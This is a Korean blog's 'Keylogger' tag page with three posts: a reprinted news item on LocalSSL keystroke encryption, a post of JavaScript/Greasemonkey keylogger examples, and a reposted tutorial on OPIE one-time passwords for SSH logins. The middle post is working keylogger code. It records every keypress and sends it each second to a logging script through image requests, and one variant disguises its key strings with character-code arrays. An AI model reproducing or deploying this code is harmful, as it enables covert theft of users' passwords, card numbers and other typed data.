'Keylogger'에 해당되는 글 3건

  1. 2014.05.08 키보드 입력값을 암호화하는 기술
  2. 2010.09.03 Javascript Keylogger 예제 (1)
  3. 2010.01.09 As old as good: One Time Passwords (1)
2014. 5. 8. 18:00

키보드 입력값을 암호화하는 기술

키보드 입력값을 암호화하는 기술 
정보출처 IEEE Computer Magazine 
원문언어 영어 
출판날짜 2005년 10월 00일 
국 가 미국 
주제분야 컴퓨터 시스템 및 하드웨어, 운영체제(R12) 

BlueGem 시큐리티사는 최근 기존의 암호 시스템이 제공하지 못했던 키보드 입력 신호를 암호화하는 ''LocalSSL''이라는 암호화 시스템 기술을 개발했다고 밝혔다. 이 기술을 사용하면 해커들이 키로거(keylogger) 툴을 사용하여 사용자의 키보드 입력 값을 알아내는 해킹을 원천적으로 봉쇄할 수 있다. 

기존의 암호화 기술은 주로 통신 시스템상의 송수신 데이터를 암호화하는 것으로 사용자의 키보드와 로컬 응용 사이의 키 입력 신호를 암호화 하지는 못했다. 키보드와 로컬 응용 사이에는 키로거 프로그램이 독립적으로, 혹은 트로이 목마 프로그램에 포함되어 존재하여 사용자의 패스워드 정보나 사회 보장 번호, 신용 카드 정보, 재정 정보, 그 외 개인 정보를 가로채어 해커에게 전송한다고 BlueGem사의 CTO인 박죠씨는 말하고 있다. 

현재 한국에서 사용되고 있는 LocalSSL 기술은 키보드 입력 신호에 대하여 128 비트 암호화 기술을 사용한다. 이 기술은 BlueGem사가 기존의 인터넷상에서 사용 되던 SSL 암호 기술을 수정한 것으로, LocalSSL 기술은 키 해킹 프로그램이 주로 존재하는 영역인 운영 체제를 우회하여 암호화 된 키 입력 값을 전송한다. 박씨는 키로거 프로그램은 주로 메시지 큐나 디바이스 드라이버 영역, 그리고 운영 체제 영역에 존재하면서 사용자 키 입력 값을 가로챈다고 한다. 

BlueGem 프로그램은 보호하고자 하는 응용의 대상에 따라 LocalSSL 인터넷과 LocalSSL 이메일, Local SSL 마이크로소프트 오피스와 같은 3개의 패키지로 구성된다. 이 제품은 모든 서버 하드웨어와 소프트웨어 제품과 호환성을 가지며, 인스톨된 프로그램의 메모리 사용량은 600K 바이트에 불과하다. 

박씨에 따르면 이 프로그램을 사용하면 사용자들은 온라인 뱅킹이나 주식 거래, 가상 사설망 접근, 신용 카드 정보, 모기지론 등과 같은 응용을 안전하게 사용할 수 있다고 한다. 이에 대해 시장 분석 업체인 아버딘 그룹 (Aberdeen Group)의 릭 사이아 (Rick Saia)씨는 "BlueGem사이 LocalSSL 제품은 비즈니스와 개인 정보보호를 위한 중요한 기능을 제공해 주며, 특히 많은 제약이 있는 금융 서비스나 건강 보험 등의 응용에 유용할 것"이라고 말한다. 



출처 : www.gtp.or.kr



Trackback 0 Comment 0
2010. 9. 3. 19:31

Javascript Keylogger 예제

var keys='';
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = 'http://localhost/junkylogger.php?keys='+keys;
keys = '';
}, 1000);


GM_setValue('keys', '');
unsafeWindow.onkeypress = function(e) {
eventobj = window.event?event:e;
key = eventobj.keyCode?eventobj.keyCode:eventobj.charCode;
keys = GM_getValue('keys');
keys+= String.fromCharCode(key);
GM_setValue('keys', keys);
}

window.setInterval(function(){
new Image().src = 'http://localhost/junkylogger.php?keys='+GM_getValue('keys');
GM_setValue('keys', '');
}, 1000);


window.wrap = window;
wrap.strf = String.fromCharCode;
wrap.wind = strf(117,110,115,97,102,101,87,105,110,100,111,119);
wrap.ev   = strf(111, 110, 107, 101, 121, 112, 114, 101, 115, 115);
GM_setValue('q','');
Function('func', wind+"."+ev+" = func")(function(e) {
e=window.event?window.event:e;
k=e.charCode?e.charCode:e.keyCode;
k=GM_getValue('q')+strf(k);
GM_setValue('q', k);
});
wrap.loc = strf(104, 116, 116, 112, 58, 47, 47, 108, 111, 99, 97, 108, 104);
wrap.loc+= strf(111, 115, 116, 47, 106, 117, 110, 107, 121, 108, 111, 103, 103, 101);
wrap.loc+= strf(114, 46, 112, 104, 112, 63, 107, 101, 121, 115, 61);
window.setInterval(function(){new Image().src=wrap.loc+GM_getValue('q');GM_setValue('q','')},1000);

Trackback 0 Comment 1
  1. 2010.09.04 17:45 address edit & del reply

    비밀댓글입니다

2010. 1. 9. 09:05

As old as good: One Time Passwords

People frequently ask me what I am doing typing on my Palm right before logging in one of my remote systems. The answer is quite simple: “generating my next password”. People always seem puzzled by that answer… Maybe I am just too old to have had only telnet sessions available to remote connections (that was the time before SSH took over)... or maybe I am just too paranoid regarding the access to my systems… Anyway, I like One Time Passwords, and here is an article I can refer to when I get asked again ;-)

One Time Passwords are just that: passwords that are good for one time use. They never repeat and once used you can throw it away securely. They were quite common when the authentication was done in clear text (so that any man-in-the-middle could steal your passwords), back in the r-tools age (rcp, rsh, rlogin, rexec, etc). After the SSH-related tools took over, providing easy tunneling and remote access, MITM attacks were of much concern, so OTPs became less relevant. What a shame, for they even have a couple of standards for those!

But there’s still room for OTPs… Question: Is it easier to deploy a MITM attack or a keylogger? That’s right… We are always connecting to our remote systems in public terminals (well… at least I am – right now typing from the hospital computer), and a keylogger is so easily installed in one of those terminals, even remotely, that no one would ever get close to deploy a refined MITM attack just to steal someone’s password. One would just install a keylogger! All the security SSH provides would just be gone by then. That’s why I use SSH to connect to my remote machines, but use OTPs to authenticate myself.

It’s so easy to deploy it. In Debian you’ll find packages opie-server and libpam-opie and those are the only things you’ll need on the server side (besides SSH, obviously). OPIE means “One-time Passwords In Everything”, and combined with PAM, one can really use it everywhere.

After installing it, you’ll have to generate the password file for your account:


spectra@home:~$ opiepasswd -c
Adding spectra:
Only use this method from the console; NEVER from remote. If you are using
telnet, xterm, or a dial-in, type ^C now or exit with no password.
Then run opiepasswd without the -c parameter.
Using MD5 to compute responses.
Enter new secret pass phrase:
Again new secret pass phrase:

ID spectra OTP key is 499 ho6484
HAVE COOK LOLA AIRY NEIL ROAM

The pass phrase will be used to generate the passwords in a step before your login. Please, try not to forget it (specially if you’re following this article and playing with some remote system at the same time). Now you can edit /etc/pam.d/ssh file (or its equivalent in non-Debian systems) to require that kind of authentication. Mine just looks like this:


# /etc/pam.d/ssh
auth       required     pam_env.so
auth       required     pam_env.so envfile=/etc/default/locale
auth       required     pam_opie.so

First two lines are unrelated and just load the environment variables. Last line is where the fun is. Please, note two things: (1) I removed references to pam_unix.so, which is what would ask for my “real” password, that I want to disable (no login is allowed with that password). And (2), I declared it as required, meaning that failing it will keep one out of the system.

We are not ready yet! SSH will work by now, but will not present you the OTP challenge. Probably you could still login, but you’d have to remember which is the current password (Trust me, you would not!). To get the challenge you’ll need to enable it – in /etc/ssh/sshd_config change the following line:


ChallengeResponseAuthentication yes

That’s it. Now to login to your remote machine, that’s what will usually happen:


spectra@hospital:~$ ssh home
otp-md5 498 ho6484 ext, Response:
spectra@home:~$

Voilà! It asks for password #498. By default, it starts with 500 passwords and goes down from that. Password #498 were asked, so the next will be #497. After that, #498 is not useable anymore, and #496 is not useable yet. You can generate a list of those passwords (let’s say 10), print it and keep it in your pocket. This is the command you’d use for that:


spectra@home:~$ opiekey -n 10 498 ho6484
Using the MD5 algorithm to compute response.
Reminder: Don't use opiekey from telnet or dial-in sessions.
Sorry, but you don't seem to be on the console or a secure terminal.
Warning: Continuing could disclose your secret pass phrase to an attacker!
Enter secret pass phrase:
489: CALM INTO WEEK APS LOON VIE
490: HASH GYM RAID GOSH HOYT DUAL
491: BELL GIN RIFT HELM GUY BUNK
492: HEBE OBOE SUP LEG LULU LANG
493: HOYT JOT ASK JOG GIBE BETH
494: NASH MOOT HIND YEAH  YAP CARL
495: MATE OF BARD LAVA LEAK AHOY
496: TAB BAG KEY GILT AVID VEAL
497: MOLE FORM NIB LEER ROSS HAVE
498: SING WERE OVEN SOD VEIN NIBS

That is not so secure, since you can loose the paper and be doomed… Luckily there are lots of small softwares that does this generation for you. Some you can use from your Palm or from some J2ME-enabled phone (such as N95). Some your can use from another (trusted) computer. Some are even online, written in javascript!

There are at least one other side-benefit of using OPIE as above: You can give away your user password (even root password – OK, probably not a Good ThingTM), that the system would still be secure, since it only allows SSH authentications via OPIE! If the session is started with a username whose opiepasswd was not activated (first step… scroll back to the beginning of the article), SSH will greet you with a bogus challenge… only “opie-activated users” will be allowed to login with the above configuration.

Easy enough, isn’t it? Now, next time you see me typing on my Palm before opening an SSH connection you’ll know what I am doing… ;-)


출처 : http://www.nardol.org


Trackback 0 Comment 1
  1. Using OPIE on Fedora 7 2010.01.13 19:23 address edit & del reply

    http://administratosphere.wordpress.com/tag/opiepasswd/